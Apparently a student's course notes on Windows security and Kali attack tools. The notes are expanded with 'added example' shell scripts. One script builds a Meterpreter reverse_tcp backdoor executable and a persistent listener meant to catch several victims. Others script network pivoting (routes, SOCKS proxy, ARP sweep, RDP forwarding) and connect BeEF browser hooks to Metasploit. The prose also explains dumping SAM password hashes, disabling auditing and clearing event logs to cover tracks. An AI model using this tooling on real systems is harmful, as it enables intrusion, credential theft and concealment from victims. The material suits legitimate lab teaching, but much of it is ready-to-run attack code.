2017-2018-2 20179226 "Network Attack and Defense" Week 7 Homework

course study

1. The core mechanisms implemented by the Windows operating system kernel are:
1) Windows process and thread management mechanism
2) Windows memory management mechanism
3) Windows file management mechanism (NTFS)
4) Windows registry management mechanism (auto-start entries in the registry: software registered under the auto-start keys runs automatically at system boot, which is why these keys are a common target of malware and rogue software)
5) Windows network mechanism (from the physical layer to the application layer of the OSI reference model, each layer has a corresponding Windows network component module)
2. Windows authorization and access control mechanism
Windows authorization and access control is based on the reference monitor model and is implemented by the SRM (Security Reference Monitor) in the kernel together with the LSASS service in user mode. On Windows Server (and on desktop Windows since Vista) the built-in whoami command shows the current user's access token; whoami /all lists the user SID, the group SIDs and the privileges the token carries. Windows abstracts every resource that needs protection into an object: files, directories, registry keys, kernel objects, synchronization objects, private objects, pipes, memory sections, communication interfaces, and so on. Each object is associated with a security descriptor (SD), whose main attributes are the Owner SID, the Group SID, the DACL (discretionary access control list, which decides who gets which access) and the SACL (system access control list, which decides which accesses are audited).
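An added example, not from the original post, of the DACL evaluation the SRM performs on an object's security descriptor, written as a POSIX shell simulation so it runs anywhere. It is simplified (no owner rights, no inheritance flags, three assumed mask bits instead of the real 32-bit access mask), and the SIDs and ACEs are constructed. It shows two things the paragraph above only names: ACEs are consulted in order, and a deny only takes effect for a bit that is still wanted, so the order of ACEs decides the outcome; and an empty DACL denies everyone while a missing (NULL) DACL protects nothing.

```sh
#!/bin/sh
# Added example, not from the original post: a simplified model of the SRM's
# DACL check. ACEs are "allow|deny <SID> <mask>", one per line, evaluated in
# order; the access mask is reduced to three assumed bits.

READ=1; WRITE=2; EXEC=4   # assumed stand-in for the real 32-bit access mask

# sid_in_token SID "SID1 SID2 ..." : succeeds when SID is one of the token's SIDs
sid_in_token() {
    for s in $2; do [ "$s" = "$1" ] && return 0; done
    return 1
}

# access_check "<token SIDs>" <desired mask> <DACL text or NULL>
# Prints GRANTED or DENIED. Rules (Windows AccessCheck, simplified):
#  - a NULL DACL (no DACL at all) grants everything: the object is unprotected
#  - an empty DACL has no allow ACE, so nobody gets anything
#  - ACEs are walked in order; a deny only matters for bits still wanted, an
#    allow adds its bits; the walk stops as soon as every wanted bit is allowed
access_check() {
    token=$1; desired=$2; dacl=$3
    if [ "$dacl" = NULL ]; then echo GRANTED; return 0; fi
    granted=0
    while read -r kind sid mask; do
        [ -n "$kind" ] || continue                 # skip blank lines
        sid_in_token "$sid" "$token" || continue   # ACE is for someone else
        remaining=$(( desired & ~granted ))
        case "$kind" in
            deny)  if [ $(( mask & remaining )) -ne 0 ]; then echo DENIED; return 0; fi ;;
            allow) granted=$(( granted | (mask & desired) )) ;;
        esac
        if [ "$granted" -eq "$desired" ]; then echo GRANTED; return 0; fi
    done <<EOF
$dacl
EOF
    echo DENIED   # ran out of ACEs with wanted bits still unallowed (or empty DACL)
}

# Constructed token and DACLs (SIDs made up in the usual S-1-5-21-... shape).
ALICE_TOKEN="S-1-5-21-1-1-1-1001 S-1-5-32-545"      # Alice's user SID + BUILTIN\Users
# Canonical order: the explicit deny on Users comes before Alice's allow,
# so Alice reads and executes but cannot write.
DEMO_DACL="deny S-1-5-32-545 $WRITE
allow S-1-5-21-1-1-1-1001 $(( READ | WRITE | EXEC ))"
# Same two ACEs in the wrong order: the allow satisfies WRITE before the
# deny is ever consulted, which is the classic non-canonical DACL mistake.
NONCANONICAL_DACL="allow S-1-5-21-1-1-1-1001 $(( READ | WRITE | EXEC ))
deny S-1-5-32-545 $WRITE"

if [ "${ACL_DEMO_RUN:-0}" = 1 ]; then
    echo "Alice READ  (canonical):     $(access_check "$ALICE_TOKEN" "$READ"  "$DEMO_DACL")"
    echo "Alice WRITE (canonical):     $(access_check "$ALICE_TOKEN" "$WRITE" "$DEMO_DACL")"
    echo "Alice WRITE (non-canonical): $(access_check "$ALICE_TOKEN" "$WRITE" "$NONCANONICAL_DACL")"
    echo "Alice READ  (empty DACL):    $(access_check "$ALICE_TOKEN" "$READ"  "")"
    echo "Alice READ  (NULL DACL):     $(access_check "$ALICE_TOKEN" "$READ"  NULL)"
fi
```

Run it with ACL_DEMO_RUN=1 sh acl.sh to see the five cases. The non-canonical case is the one to remember when reviewing real DACLs with icacls or Get-Acl: Windows itself keeps explicit denies in front of allows, but tools that write ACLs directly can produce the reversed order, and then the deny is dead weight.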
3. Windows remote security attack and defense technology
Windows remote attack and defense techniques fall into three categories: remote password guessing and cracking, attacks on Windows network services, and attacks on Windows clients and users. The lifecycle of a security vulnerability on Windows systems runs from discovery and disclosure, through penetration testing and exploitation, to vulnerability patching.
4. Other security mechanisms of Windows
Authentication, authorization and access control, and security auditing are the three basic security functions. The three most critical measures for keeping a Windows system running safely and stably are the firewall, automatic patch updates and virus protection, which are what Security Center monitors. Beyond Security Center, Windows security features include IPSec encryption and authentication, the EFS encrypting file system, the Windows File Protection mechanism, and the privacy and browsing protections of the bundled IE browser.
5. Windows system password ciphertext extraction technology
There are three main ways to obtain the password hashes locally:
1) Boot another operating system and copy the password hash files from the file system (the SAM hive, together with the SYSTEM hive that holds the boot key needed to decrypt it; on Kali, samdump2 SYSTEM SAM dumps the hashes from such copies);
2) Use the rdisk tool from the Emergency Repair Disk utility on NT 4: rdisk /s- creates a backup copy of the SAM in the repair directory;
3) Use the pwdumpX series of tools to extract the hashes directly from the SAM or from Active Directory.
6. Covering tracks on Windows
1) Turn off auditing (auditing can be disabled easily, e.g. with the built-in auditpol utility);
2) Clean up the event log (open, read and clear the event logs on the host with Event Viewer).


video learning

1. Retrieval and Exploitation of KaliSecurity Vulnerabilities

searchsploit
searchsploit searches the local Exploit-DB copy by keyword and lists the matching entries together with the path of each exploit file. For example, searchsploit wordpress lists the WordPress-related vulnerabilities and their file addresses.

Check the files listed, for example with searchsploit -x <path> to view one, or searchsploit -m <path> to copy it into the current directory before adapting it.

2. The Metasploit Foundation of KaliSecurity Vulnerability Exploitation

Metasploit is widely used in penetration testing. It bundles many tools that together form a complete attack framework.
1. Start the services
To use Metasploit with its database in Kali, start the PostgreSQL service first and then the Metasploit service; after that the msf database can be used to store and query hosts, services and exploit results.

service postgresql start
service metasploit start

If you do not want to start the services manually after every boot, enable them at system start with update-rc.d postgresql enable and update-rc.d metasploit enable. On current Kali releases there is no separate metasploit service: start (or enable) postgresql with systemctl and initialise the database once with msfdb init.
2. Paths
msf in Kali lives under /usr/share/metasploit-framework, with the modules in its modules subdirectory:
auxiliary: auxiliary modules (scanners, servers, fuzzers)
encoders: the encoders used by msfencode; list them with msfencode -l
exploits: attack modules; the ms08_067_netapi exploit that every msf introduction mentions is in this directory (exploits/windows/smb/ms08_067_netapi.rb)
payloads: attack payloads, that is, the code executed after the exploit succeeds; the windows/meterpreter/reverse_tcp we often set lives here
post: post-exploitation modules, used once a Meterpreter shell has been obtained; the commonly used hashdump and arp_scanner are here
3. Basic commands
msfpayload: generates a payload or shellcode.
To search, use msfpayload -l | grep "windows".
The S (summary) output mode lists the parameters a payload needs.
msfencode: the encoder in msf. Originally used to encode payloads to bypass AV, it is now mainly used on the output of msfpayload to avoid the bad characters an exploit cannot carry.
Note that msfpayload and msfencode were merged into msfvenom and removed from the framework in 2015; on a current Kali, msfvenom -h shows the equivalent options (payload listing, option listing, encoder and bad-character selection).
1) Enter msfconsole to open msf:

2) Find vulnerabilities: use nmap -sV 192.168.1.124 to identify the services and versions on the target (run it as db_nmap inside msfconsole and the results are stored in the msf database):

3) Use set to configure the parameters (show options lists what the chosen module needs; set RHOST, PAYLOAD, LHOST and so on, then exploit):

3. Introduction to Meterpreter of KaliSecurity Vulnerability Exploitation

Meterpreter is an extension module of the Metasploit framework, used as the attack payload after a successful overflow. Once the exploit succeeds, the payload gives us a control channel back to the target, so choosing it as the payload yields a Meterpreter shell connected to the target system.
As the post-exploitation stage, Meterpreter comes in several types, and its commands consist of core commands plus extension library commands, which greatly broadens the available attack methods. Its useful functions include adding a user, hiding things, opening a shell, obtaining user password hashes, uploading and downloading files to and from the remote host, running cmd.exe, capturing the screen, taking remote control, capturing keystrokes, clearing application logs, showing the remote host's system information, and showing its network interfaces and IP addresses.
Common commands:
background: put the current session into the background
load/use: load an extension
interact: switch into a channel
migrate: migrate into another process
run: execute an existing script or post module (run followed by Tab lists all available scripts); the commonly used ones are autoroute, hashdump, arp_scanner, multi_inject, etc.
resource: execute an existing rc script
The commonly used Meterpreter type is payload/windows/meterpreter/reverse_tcp: for Windows targets, a reverse-connect shell, which is relatively stable to use.
Generate the Meterpreter backdoor; open msf and start the listener (select exploit/multi/handler); execute door.exe on the target machine:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.8.113 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe /* check that your own IP address is 192.168.8.113; LHOST and LPORT are the reverse_tcp parameters and can be looked up in msf (remember to start the service first) */
msfpayload and msfencode were removed from Metasploit in 2015 and replaced by msfvenom, which generates and encodes in one step. Whichever tool is used, the handler must be set to the same payload, LHOST and LPORT that were baked into door.exe, and it must be listening before door.exe runs on the target.
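The backdoor-plus-handler procedure above, as an added example that is not part of the original post: a POSIX shell script that derives both the msfvenom command (msfvenom replaced msfpayload and msfencode in 2015) and the handler resource script from one LHOST/LPORT pair, so the two cannot drift apart. The IP 192.168.8.113, port 2333 and the /root paths are the post's values; the x86/shikata_ga_nai encoder with 5 iterations is assumed as the equivalent of msfencode -c 5, and the validation helpers are mine, not Metasploit's.

```sh
#!/bin/sh
# Added example (not from the original post): build the reverse_tcp Meterpreter
# backdoor and the matching multi/handler with current Metasploit tooling.
# Assumptions (not from the page): x86 payload, 5 iterations of shikata_ga_nai
# as the stand-in for "msfencode -c 5", output under /root.

# Reject an LHOST that is not a dotted quad: a typo here silently produces a
# backdoor that can never call back.
valid_ipv4() {
    case "$1" in
        *[!0-9.]*|""|.*|*.|*..*) return 1 ;;
    esac
    oldifs=$IFS; IFS=.; set -- $1; IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for o in "$@"; do
        [ -n "$o" ] && [ "$o" -le 255 ] || return 1
    done
}

# LPORT must be a number in 1..65535.
valid_port() {
    case "$1" in
        ""|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the msfvenom command equivalent to the post's
# "msfpayload ... R | msfencode -t exe -c 5 > door.exe".
msfvenom_cmd() {
    lhost=$1; lport=$2; out=$3
    valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
    printf 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 5 -f exe -o %s\n' \
        "$lhost" "$lport" "$out"
}

# Write the handler resource script. PAYLOAD, LHOST and LPORT are the same
# values baked into door.exe; ExitOnSession false plus -j -z keeps the
# listener up so several victims can call back.
write_handler_rc() {
    lhost=$1; lport=$2; rc=$3
    valid_ipv4 "$lhost" || return 1
    valid_port "$lport" || return 1
    cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

main() {
    lhost=${1:-192.168.8.113}; lport=${2:-2333}; workdir=${3:-/root}
    msfvenom_cmd "$lhost" "$lport" "$workdir/door.exe" || return 1   # run this line to build the exe
    write_handler_rc "$lhost" "$lport" "$workdir/handler.rc" || return 1
    echo "then: msfconsole -q -r $workdir/handler.rc   # start this before door.exe runs on the target"
}
if [ "${MSF_LAB_RUN:-0}" = 1 ]; then main "$@"; fi
```

Run MSF_LAB_RUN=1 sh door.sh [LHOST] [LPORT] to write handler.rc and print the msfvenom line to execute; with the defaults it reproduces the post's 192.168.8.113:2333 setup.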

4. Metasploit post-penetration testing of KaliSecurity exploits

Once the springboard host has been obtained with some level of privilege, the next step is to expand into the intranet: enumerate the internal hosts, collect the target information, and probe for vulnerabilities. With the Meterpreter backdoor msf already holds, this series of operations becomes much easier.
1. View the current network cards and network segments (ifconfig in Meterpreter). Three interfaces are visible: the loopback interface, the one we reached the host on, and one with an intranet IP that we cannot reach directly (try ping from the attacker to confirm).
2. Add a route: run autoroute -s 10.0.0.0/24 (the subnet in CIDR form, or with a netmask given by -n) lets msf modules attack or scan across the network segment through the session. The autoroute script adds it quickly, and route print in msfconsole shows the result.
3. Open a SOCKS proxy with the auxiliary/server/socks4a module (auxiliary/server/socks_proxy on Metasploit 5 and later); through proxychains it can serve a browser, sqlmap or nmap, so intranet hosts can be reached via the proxy. Note that SOCKS carries only TCP connections, so nmap must run with -sT -Pn.
4. Switch between sessions freely with background and sessions -i <id>.
5. Type run followed by Tab to see the many scripts that can be run in Meterpreter.
6. The post-exploitation modules are listed by run post/ followed by Tab.
7. Obtain intranet information: run arp_scanner -r 10.0.0.1/24
8. Files can also be uploaded, ports forwarded and follow-up tests performed; for example upload lcx.exe c:\\ copies lcx.exe to the root of the C: drive, and portfwd add -l 3389 -p 3389 -r <intranet host> brings an intranet host's RDP to the attacker's local port 3389.
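The pivot setup in steps 2, 3, 7 and 8 above, as an added example that is not part of the original post: a POSIX shell script that emits one Metasploit resource script (route, SOCKS server, ARP sweep, port forward) and the matching proxychains entry from a single set of values, so the proxy port and subnet cannot disagree between the two tools. The session id 1, the 10.0.0.0/24 subnet, the intranet host 10.0.0.5 and the proxy port 1080 are assumptions, and the CIDR check is mine; the msf commands themselves (route add, auxiliary/server/socks4a, sessions -C, arp_scanner, portfwd) are the framework's.

```sh
#!/bin/sh
# Added example (not from the original post): the pivot setup of the section
# above as a resource script plus a proxychains line, generated together.
# Assumptions (not from the page): Meterpreter session id 1, intranet
# 10.0.0.0/24, one interesting host 10.0.0.5, SOCKS listener on 127.0.0.1:1080.

# Accept only a network in CIDR form (a.b.c.d/n). A bare host address would
# route exactly one box, which is the mistake "-s 10.0.0.1" invites.
valid_cidr() {
    case "$1" in
        [0-9]*.[0-9]*.[0-9]*.[0-9]*/[0-9]*) ;;
        *) return 1 ;;
    esac
    bits=${1##*/}
    case "$bits" in *[!0-9]*) return 1 ;; esac
    [ "$bits" -le 32 ]
}

# write_pivot_rc <session id> <cidr> <socks port> <host to forward RDP from> <rc file>
write_pivot_rc() {
    sid=$1; cidr=$2; socks_port=$3; fwd_host=$4; rc=$5
    valid_cidr "$cidr" || { echo "subnet must be a.b.c.d/n, got: $cidr" >&2; return 1; }
    cat > "$rc" <<EOF
# route $cidr through Meterpreter session $sid
# (same effect as "run autoroute -s $cidr" inside the session)
route add $cidr $sid
route print
# SOCKS4a listener for tools outside msf; Metasploit 5+ ships it as
# auxiliary/server/socks_proxy with "set VERSION 4a"
use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
set SRVPORT $socks_port
run -j
# host discovery on the pivoted subnet, run inside the session
sessions -C "run arp_scanner -r $cidr" -i $sid
# bring one intranet host's RDP to the attacker's local port 3389
sessions -C "portfwd add -l 3389 -p 3389 -r $fwd_host" -i $sid
EOF
}

# The proxychains entry that points at the msf SOCKS server.
proxychains_line() {
    printf 'socks4 127.0.0.1 %s\n' "$1"
}

main() {
    rc=${1:-/root/pivot.rc}
    write_pivot_rc 1 10.0.0.0/24 1080 10.0.0.5 "$rc" || return 1
    echo "msfconsole -q -r $rc      # once the Meterpreter session exists"
    echo "append to /etc/proxychains4.conf: $(proxychains_line 1080)"
    echo "then: proxychains nmap -sT -Pn -p 445 10.0.0.5   # SOCKS proxies TCP only, so no SYN scan or ping"
}
if [ "${MSF_LAB_RUN:-0}" = 1 ]; then main "$@"; fi
```

Run MSF_LAB_RUN=1 sh pivot.sh to write pivot.rc and print the follow-up commands. The rc script is meant to be loaded after the reverse_tcp session is already up; if the session id differs, pass it into write_pivot_rc.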

5. BeEF of KaliSecurity Vulnerability Exploitation

1. Run the beef-xss command to start BeEF.

2. Log in with the default username beef and default password beef (recent BeEF releases refuse to start until this default password has been changed in config.yaml).

3. The hook lasts until the test page is closed. During that time the browser is effectively under control and attack commands can be sent to it. In the Commands module many tasks can be accomplished.
The four colours of the command modules mean:
Green: the module works against the target and should be invisible to the user
Orange: the module works against the target, but may be visible to the user
Grey: the module has not yet been verified against this target
Red: the module does not work against this target
4. For example, select the Raw JavaScript module under Misc as a test case: the panel on the right describes the module and its available parameters. Enter the JavaScript code and click Execute to run it in the hooked browser.
5. Proxy function
Select the target host, right-click, and choose Use as Proxy in the menu; then compose and send the request you want in Forge Request under the Rider tab.
6. BeEF does not load Metasploit by default. To use Metasploit's rich set of attack modules, some configuration is needed.

Set the metasploit extension's enable line in /usr/share/beef-xss/config.yaml to true

and make sure the IP and the other settings in the extension's own configuration are correct (127.0.0.1 does not work; use the box's LAN IP), and set the custom path to the Metasploit installation. After configuration, open msfconsole and run load msgrpc ServerHost=192.168.1.124 Pass=abc123. The host, port (55552 by default), user (msf by default) and password given to msgrpc must match the values in BeEF's Metasploit configuration, otherwise BeEF cannot connect to the RPC server.
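The BeEF-to-Metasploit wiring in step 6 above, as an added example that is not part of the original post or of either project: a POSIX shell script that flips the enable line in BeEF's config.yaml, and emits the extension settings and the msfconsole msgrpc command from one set of values so that host, port, user, password and SSL agree on both sides. The IP 192.168.1.124 and password abc123 are the post's; the port 55552 and user msf are the msgrpc defaults; the YAML key names and indentation follow recent BeEF releases and are an assumption to check against your installed version.

```sh
#!/bin/sh
# Added example (not from the original post): keep BeEF's Metasploit extension
# and msfconsole's msgrpc plugin in agreement. Assumptions (not from the page):
# YAML layout of recent BeEF releases, msgrpc defaults port 55552 / user msf,
# BeEF and msf on the same Kali box at 192.168.1.124.

# The RPC host is handed to hooked browsers (callback_host) and to the msf
# client, so loopback only works when the victim is the same machine.
check_rpc_host() {
    case "$1" in
        ""|127.*|localhost|0.0.0.0) return 1 ;;
        *) return 0 ;;
    esac
}

# Flip "enable: false" to true inside the metasploit block of the main
# config.yaml (the line the section above says to edit); edits in place.
enable_metasploit_ext() {
    cfg=$1
    awk '
        /^[ \t]*metasploit:/ { inblk = 1; print; next }
        inblk && /^[ \t]*enable:/ { sub(/false/, "true"); inblk = 0 }
        { print }
    ' "$cfg" > "$cfg.tmp" && mv "$cfg.tmp" "$cfg"
}

# Settings for extensions/metasploit/config.yaml (assumed key names/layout).
beef_msf_yaml() {
    host=$1; port=$2; user=$3; pass=$4
    check_rpc_host "$host" || { echo "RPC host must be a reachable LAN address, not '$host'" >&2; return 1; }
    cat <<EOF
beef:
    extension:
        metasploit:
            name: 'Metasploit'
            enable: true
            host: "$host"
            port: $port
            user: "$user"
            pass: "$pass"
            uri: '/api'
            ssl: true
            callback_host: "$host"
            msf_path: [
              {os: 'kali', path: '/usr/share/metasploit-framework/'},
              {os: 'custom', path: '/usr/share/metasploit-framework/'}
            ]
EOF
}

# The matching line for msfconsole; every value mirrors the YAML above.
msgrpc_cmd() {
    host=$1; port=$2; user=$3; pass=$4
    check_rpc_host "$host" || return 1
    printf 'load msgrpc ServerHost=%s ServerPort=%s User=%s Pass=%s SSL=y\n' \
        "$host" "$port" "$user" "$pass"
}

main() {
    host=${1:-192.168.1.124}; port=${2:-55552}; user=${3:-msf}; pass=${4:-abc123}
    beef_msf_yaml "$host" "$port" "$user" "$pass" || return 1
    echo "--- type into msfconsole (or put in an rc file) before starting beef-xss:"
    msgrpc_cmd "$host" "$port" "$user" "$pass"
}
if [ "${BEEF_LAB_RUN:-0}" = 1 ]; then main "$@"; fi
```

Run BEEF_LAB_RUN=1 sh beef-msf.sh [host] [port] [user] [pass] to print both halves; call enable_metasploit_ext /usr/share/beef-xss/config.yaml once for the enable line. Start msfconsole and load msgrpc first, then beef-xss, since BeEF connects to the RPC server at startup.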

Origin http://43.154.161.224:23101/article/api/json?id=324616292&siteId=291194637